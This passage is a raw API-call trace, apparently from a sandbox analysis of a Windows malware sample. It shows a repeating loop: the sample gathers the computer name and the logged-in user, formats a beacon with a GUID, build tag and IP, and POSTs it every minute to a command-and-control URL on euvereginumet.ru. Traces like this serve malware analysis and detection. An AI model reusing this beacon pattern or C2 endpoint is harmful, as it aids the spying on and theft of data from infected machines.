lpBuffer=0x2470020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x1afd40 | out: lpBuffer=0x2470020*, lpdwNumberOfBytesRead=0x1afd40*=0xc) returned 1 [0206.710] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0206.711] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0206.711] Sleep (dwMilliseconds=0xea60) [0216.719] Sleep (dwMilliseconds=0xea60) [0226.735] GetVersion () returned 0x1db10106 [0226.736] GetComputerNameA (in: lpBuffer=0x1ae2d8, nSize=0x1ae3dc | out: lpBuffer="Q9IATRKPRH", nSize=0x1ae3dc) returned 1 [0226.736] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0226.736] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0226.736] K32EnumProcesses (in: lpidProcess=0x1ace98, cb=0x1000, lpcbNeeded=0x1adfa0 | out: lpidProcess=0x1ace98, lpcbNeeded=0x1adfa0) returned 1 [0226.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0226.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0226.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0226.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0226.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0226.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0226.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0226.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0226.744] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0226.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0226.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0226.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0226.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2bc) returned 0x0 [0226.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0226.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0226.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0226.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x20c) returned 0x0 [0226.745] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0x2ac [0226.745] K32GetProcessImageFileNameA (in: hProcess=0x2ac, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\System32\\dwm.exe") returned 0x30 [0226.745] CloseHandle (hObject=0x2ac) returned 1 [0226.746] lstrcpyA (in: lpString1=0x1ade98, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0226.746] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0226.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x2ac [0226.746] K32GetProcessImageFileNameA (in: hProcess=0x2ac, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0226.746] CloseHandle (hObject=0x2ac) returned 1 [0226.746] lstrcpyA (in: lpString1=0x1ade98, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0226.746] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0226.746] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x2ac [0226.746] OpenProcessToken (in: ProcessHandle=0x2ac, DesiredAccess=0x20008, TokenHandle=0x1adf8c | out: TokenHandle=0x1adf8c*=0x2b0) returned 1 [0226.747] GetTokenInformation (in: TokenHandle=0x2b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adf94 | out: TokenInformation=0x0, ReturnLength=0x1adf94) returned 0 [0226.747] GetLastError () returned 0x7a [0226.747] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x3fa860 [0226.747] GetTokenInformation (in: TokenHandle=0x2b0, TokenInformationClass=0x1, TokenInformation=0x3fa860, TokenInformationLength=0x24, ReturnLength=0x1adf94 | out: TokenInformation=0x3fa860, ReturnLength=0x1adf94) returned 1 [0226.747] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x3fa868*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x1adfb4, cchName=0x1adfa8, ReferencedDomainName=0x1ae0b8, cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c | out: Name="kEecfMwgj", cchName=0x1adfa8, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c) returned 1 [0226.752] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3fa860 | out: hHeap=0x370000) returned 1 [0226.752] lstrcpyA (in: lpString1=0x1ae1d4, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0226.752] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0226.752] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0226.752] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0226.752] lstrcpyA (in: lpString1=0x1afcec, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0226.752] DsEnumerateDomainTrustsA () returned 0x6b5 [0226.757] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75c50000 [0226.757] GetProcAddress (hModule=0x75c50000, lpProcName="GetNativeSystemInfo") returned 0x75c710b5 [0226.757] GetNativeSystemInfo (in: lpSystemInfo=0x1ae3b8 | out: lpSystemInfo=0x1ae3b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0226.758] wsprintfA (in: param_1=0x1ae3ec, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0226.758] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0226.758] lstrlenA (lpString="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0226.758] InternetCrackUrlA (in: lpszUrl="http://euvereginumet.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae364 | out: lpUrlComponents=0x1ae364) returned 1 [0226.758] InternetConnectA (hInternet=0xcc0004, lpszServerName="euvereginumet.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0226.760] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0226.760] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x1ae3ec*, dwOptionalLength=0x79) returned 1 [0226.845] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1ae3b8, lpdwBufferLength=0x1ae3a0, lpdwIndex=0x0 | out: lpBuffer=0x1ae3b8*, lpdwBufferLength=0x1ae3a0*=0x4, lpdwIndex=0x0) returned 1 [0226.845] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2470020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x1afd40 | out: lpBuffer=0x2470020*, lpdwNumberOfBytesRead=0x1afd40*=0xc) returned 1 [0226.845] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0226.846] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0226.846] Sleep (dwMilliseconds=0xea60) [0236.858] Sleep (dwMilliseconds=0xea60) [0246.874] GetVersion () returned 0x1db10106 [0246.874] GetComputerNameA (in: lpBuffer=0x1ae2d8, nSize=0x1ae3dc | out: lpBuffer="Q9IATRKPRH", nSize=0x1ae3dc) returned 1 [0246.875] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0246.875] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0246.875] K32EnumProcesses (in: lpidProcess=0x1ace98, cb=0x1000, lpcbNeeded=0x1adfa0 | out: lpidProcess=0x1ace98, lpcbNeeded=0x1adfa0) returned 1 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0246.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2bc) returned 0x0 [0246.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0246.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0246.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0246.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x20c) returned 0x0 [0246.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0x32c [0246.880] K32GetProcessImageFileNameA (in: hProcess=0x32c, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\System32\\dwm.exe") returned 0x30 [0246.880] CloseHandle (hObject=0x32c) returned 1 [0246.881] lstrcpyA (in: lpString1=0x1ade98, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0246.881] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0246.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x32c [0246.881] K32GetProcessImageFileNameA (in: hProcess=0x32c, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0246.881] CloseHandle (hObject=0x32c) returned 1 [0246.882] lstrcpyA (in: lpString1=0x1ade98, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0246.882] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0246.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x32c [0246.882] OpenProcessToken (in: ProcessHandle=0x32c, DesiredAccess=0x20008, TokenHandle=0x1adf8c | out: TokenHandle=0x1adf8c*=0x314) returned 1 [0246.882] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adf94 | out: TokenInformation=0x0, ReturnLength=0x1adf94) returned 0 [0246.882] GetLastError () returned 0x7a [0246.882] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x3faa40 [0246.882] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x1, TokenInformation=0x3faa40, TokenInformationLength=0x24, ReturnLength=0x1adf94 | out: TokenInformation=0x3faa40, ReturnLength=0x1adf94) returned 1 [0246.882] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x3faa48*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x1adfb4, cchName=0x1adfa8, ReferencedDomainName=0x1ae0b8, cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c | out: Name="kEecfMwgj", cchName=0x1adfa8, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c) returned 1 [0246.887] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3faa40 | out: hHeap=0x370000) returned 1 [0246.887] lstrcpyA (in: lpString1=0x1ae1d4, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0246.887] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0246.887] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0246.887] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0246.887] lstrcpyA (in: lpString1=0x1afcec, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0246.887] DsEnumerateDomainTrustsA () returned 0x6b5 [0246.893] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75c50000 [0246.893] GetProcAddress (hModule=0x75c50000, lpProcName="GetNativeSystemInfo") returned 0x75c710b5 [0246.894] GetNativeSystemInfo (in: lpSystemInfo=0x1ae3b8 | out: lpSystemInfo=0x1ae3b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0246.894] wsprintfA (in: param_1=0x1ae3ec, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0246.894] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0246.894] lstrlenA (lpString="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0246.894] InternetCrackUrlA (in: lpszUrl="http://euvereginumet.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae364 | out: lpUrlComponents=0x1ae364) returned 1 [0246.894] InternetConnectA (hInternet=0xcc0004, lpszServerName="euvereginumet.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0246.897] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0246.897] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x1ae3ec*, dwOptionalLength=0x79) returned 1 [0247.124] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1ae3b8, lpdwBufferLength=0x1ae3a0, lpdwIndex=0x0 | out: lpBuffer=0x1ae3b8*, lpdwBufferLength=0x1ae3a0*=0x4, lpdwIndex=0x0) returned 1 [0247.124] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2470020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x1afd40 | out: lpBuffer=0x2470020*, lpdwNumberOfBytesRead=0x1afd40*=0xc) returned 1 [0247.124] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0247.124] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0247.124] Sleep (dwMilliseconds=0xea60) [0257.942] Sleep (dwMilliseconds=0xea60) [0269.866] GetVersion () returned 0x1db10106 [0269.867] GetComputerNameA (in: lpBuffer=0x1ae2d8, nSize=0x1ae3dc | out: lpBuffer="Q9IATRKPRH", nSize=0x1ae3dc) returned 1 [0269.867] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0269.867] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0269.867] K32EnumProcesses (in: lpidProcess=0x1ace98, cb=0x1000, lpcbNeeded=0x1adfa0 | out: lpidProcess=0x1ace98, lpcbNeeded=0x1adfa0) returned 1 [0269.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0269.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0269.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0269.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0269.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0269.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2bc) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x20c) returned 0x0 [0269.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0x33c [0269.871] K32GetProcessImageFileNameA (in: hProcess=0x33c, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\System32\\dwm.exe") returned 0x30 [0269.871] CloseHandle (hObject=0x33c) returned 1 [0269.872] lstrcpyA (in: lpString1=0x1ade98, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0269.872] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0269.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x33c [0269.872] K32GetProcessImageFileNameA (in: hProcess=0x33c, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0269.872] CloseHandle (hObject=0x33c) returned 1 [0269.872] lstrcpyA (in: lpString1=0x1ade98, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0269.872] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0269.872] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x33c [0269.872] OpenProcessToken (in: ProcessHandle=0x33c, DesiredAccess=0x20008, TokenHandle=0x1adf8c | out: TokenHandle=0x1adf8c*=0x340) returned 1 [0269.872] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adf94 | out: TokenInformation=0x0, ReturnLength=0x1adf94) returned 0 [0269.872] GetLastError () returned 0x7a [0269.872] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x3faa10 [0269.872] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x3faa10, TokenInformationLength=0x24, ReturnLength=0x1adf94 | out: TokenInformation=0x3faa10, ReturnLength=0x1adf94) returned 1 [0269.872] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x3faa18*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x1adfb4, cchName=0x1adfa8, ReferencedDomainName=0x1ae0b8, cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c | out: Name="kEecfMwgj", cchName=0x1adfa8, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c) returned 1 [0269.875] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3faa10 | out: hHeap=0x370000) returned 1 [0269.875] lstrcpyA (in: lpString1=0x1ae1d4, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0269.875] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0269.875] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0269.875] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0269.875] lstrcpyA (in: lpString1=0x1afcec, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0269.875] DsEnumerateDomainTrustsA () returned 0x6b5 [0269.878] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75c50000 [0269.879] GetProcAddress (hModule=0x75c50000, lpProcName="GetNativeSystemInfo") returned 0x75c710b5 [0269.879] GetNativeSystemInfo (in: lpSystemInfo=0x1ae3b8 | out: lpSystemInfo=0x1ae3b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0269.879] wsprintfA (in: param_1=0x1ae3ec, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0269.879] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0269.879] lstrlenA (lpString="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0269.879] InternetCrackUrlA (in: lpszUrl="http://euvereginumet.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae364 | out: lpUrlComponents=0x1ae364) returned 1 [0269.879] InternetConnectA (hInternet=0xcc0004, lpszServerName="euvereginumet.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0269.881] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0269.881] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x1ae3ec*, dwOptionalLength=0x79) returned 1 [0270.055] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1ae3b8, lpdwBufferLength=0x1ae3a0, lpdwIndex=0x0 | out: lpBuffer=0x1ae3b8*, lpdwBufferLength=0x1ae3a0*=0x4, lpdwIndex=0x0) returned 1 [0270.055] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2470020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x1afd40 | out: lpBuffer=0x2470020*, lpdwNumberOfBytesRead=0x1afd40*=0xc) returned 1 [0270.055] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0270.055] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0270.055] Sleep (dwMilliseconds=0xea60) [0280.068] Sleep (dwMilliseconds=0xea60) [0290.099] GetVersion () returned 0x1db10106 [0290.099] GetComputerNameA (in: lpBuffer=0x1ae2d8, nSize=0x1ae3dc | out: lpBuffer="Q9IATRKPRH", nSize=0x1ae3dc) returned 1 [0290.099] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0290.100] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0290.100] K32EnumProcesses (in: lpidProcess=0x1ace98, cb=0x1000, lpcbNeeded=0x1adfa0 | out: lpidProcess=0x1ace98, lpcbNeeded=0x1adfa0) returned 1 [0290.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0290.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0290.104] OpenProcess 